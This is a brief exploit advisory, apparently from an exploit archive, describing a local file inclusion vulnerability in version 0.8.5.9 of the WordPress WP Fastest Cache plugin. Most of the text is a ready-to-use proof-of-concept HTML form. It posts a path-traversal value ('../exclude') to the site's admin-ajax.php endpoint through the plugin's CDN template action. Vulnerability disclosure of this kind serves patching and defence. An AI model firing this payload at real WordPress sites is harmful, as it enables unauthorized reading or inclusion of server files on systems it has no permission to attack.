WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞

WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability.

<html>
   <body>
      <form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
         <input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" />
         <input type="hidden" name="id" value="../exclude" />
         <input type="submit" />
      </form>
   </body>
</html>